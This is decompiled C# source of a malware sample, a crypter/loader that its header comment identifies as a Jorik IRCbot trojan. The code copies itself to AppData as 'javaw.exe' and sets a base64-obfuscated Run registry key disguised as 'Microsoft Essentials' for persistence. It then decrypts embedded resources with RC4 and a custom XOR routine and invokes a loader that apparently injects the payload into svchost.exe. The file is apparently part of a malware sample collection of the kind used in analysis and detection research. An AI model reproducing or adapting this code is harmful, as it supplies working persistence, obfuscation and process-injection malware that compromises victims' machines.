// Decompiled with JetBrains decompiler
// Type: CrypterSource.Program
// Assembly: AryanF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2EB8EB51-C97D-4251-9393-007DD226E453
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27.exe

using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Text;

namespace CrypterSource
{
  internal class Program
  {
    private static void Main()
    {
      try
      {
        File.Copy(Assembly.GetExecutingAssembly().Location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe");
        Registry.CurrentUser.OpenSubKey(Encoding.ASCII.GetString(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), true).SetValue("Microsoft Essentials", (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe"), RegistryValueKind.String);
        ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());
        byte[] numArray = Program.PolyRevDecrypt((byte[]) resourceManager.GetObject("_CLRb98hOPqbyekD5To7d"), "_uxiONH6s");
        Type type = Assembly.Load(Program.RC4((byte[]) resourceManager.GetObject("lolumad"), "_FmEb1ONweckrT3iv")).GetTypes()[0];
        type.GetMethod("Run").Invoke(Activator.CreateInstance(type), new object[2]
        {
          (object) numArray,
          (object) "svchost.exe"
        });
      }
      catch
      {
      }
    }

    public static byte[] RC4(byte[] bytes, string Key)
    {
      byte[] bytes1 = Encoding.ASCII.GetBytes(Key);
      byte[] numArray1 = new byte[256];
      byte[] numArray2 = new byte[256];
      for (int index = 0; index < 256; ++index)
      {
        numArray1[index] = (byte) index;
        numArray2[index] = bytes1[index % bytes1.GetLength(0)];
      }
      int index1 = 0;
      for (int index2 = 0; index2 < 256; ++index2)
      {
        index1 = (index1 + (int) numArray1[index2] + (int) numArray2[index2]) % 256;
        byte num = numArray1[index2];
        numArray1[index2] = numArray1[index1];
        numArray1[index1] = num;
      }
      int index3;
      int index4 = index3 = 0;
      for (int index5 = 0; index5 < bytes.GetLength(0); ++index5)
      {
        index4 = (index4 + 1) % 256;
        index3 = (index3 + (int) numArray1[index4]) % 256;
        byte num = numArray1[index4];
        numArray1[index4] = numArray1[index3];
        numArray1[index3] = num;
        int index6 = ((int) numArray1[index4] + (int) numArray1[index3]) % 256;
        bytes[index5] ^= numArray1[index6];
      }
      return bytes;
    }

    public static byte[] PolyRevDecrypt(byte[] data, string pass)
    {
      Array.Reverse((Array) data);
      byte num = data[data.Length - 1];
      byte[] bytes = Encoding.ASCII.GetBytes(pass);
      byte[] array = new byte[data.Length + 1];
      int index1 = 0;
      for (int index2 = 0; index2 <= data.Length - 1; ++index2)
      {
        array[index2] = (byte) ((uint) data[index2] ^ (uint) num ^ (uint) bytes[index1]);
        Array.Reverse((Array) bytes);
        if (index1 == bytes.Length - 1)
          index1 = 0;
        else
          ++index1;
      }
      Array.Resize<byte>(ref array, array.Length - 2);
      return array;
    }

    private static void OHNADWHOWADHohdwAOHD()
    {
    }
  }
}